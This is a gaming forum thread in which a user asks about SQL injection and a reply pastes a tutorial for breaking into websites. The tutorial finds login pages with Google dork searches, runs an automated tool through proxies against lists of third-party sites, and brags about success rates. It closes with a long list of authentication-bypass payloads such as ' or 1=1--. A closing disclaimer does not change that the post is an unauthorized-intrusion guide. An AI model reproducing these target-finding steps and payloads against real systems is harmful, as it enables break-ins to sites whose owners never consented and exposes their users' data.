Register for your free account! | Forgot your password?

Go Back   elitepvpers > MMORPGs > RF Online
You last visited: Today at 15:49

  • Please register to post and access all features, it's quick, easy and FREE!

 

URL sql injection

Reply
 
Old   #1
 
elite*gold: 0
Join Date: May 2008
Posts: 78
Received Thanks: 8
URL sql injection

any one could give me hints or anything on what url should i put in sql injection for rf online.. im a bit confused.. thanks



killemall is offline  
Old   #2
 
elite*gold: 0
Join Date: Jun 2008
Posts: 63
Received Thanks: 41
...LOL!!..Use SEARCH button,everything is there..


jan1993 is offline  
Thanks
1 User
Old   #3
 
elite*gold: 0
Join Date: Apr 2006
Posts: 564
Received Thanks: 319
Technorati Tag: SQL Injection
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


WHAT I DO :

first let me go into details on how i go about my research



i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets



PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

Google

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so




and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting

ComSec aka ZSL



*******************************************

WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay


credits to google... LOL
playforbooting is offline  
Thanks
3 Users
Reply



« Previous Thread | Next Thread »

Similar Threads
Injection How To
1.) Wo kriege ich Injection her? -> http://injection.sourceforge.net/ 2.) Knallt euch dann alles in ein Verzeichnis, besorgt euch dann einne...
17 Replies - General Gaming Discussion
Sql injection
Eine frage woher bekomme ich den Sql Injection + tut würde mich freuen wenn einer mir weiter hilft danke
34 Replies - Kal Online
SQL injection.
Hi all, This is a curious topic because i have found numerous occasions where this has happened on the chinese version of the game. Also i was...
0 Replies - Zero
DLL Injection
???
5 Replies - Planetside



All times are GMT +2. The time now is 15:49.


Powered by vBulletin®
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy
Copyright ©2017 elitepvpers All Rights Reserved.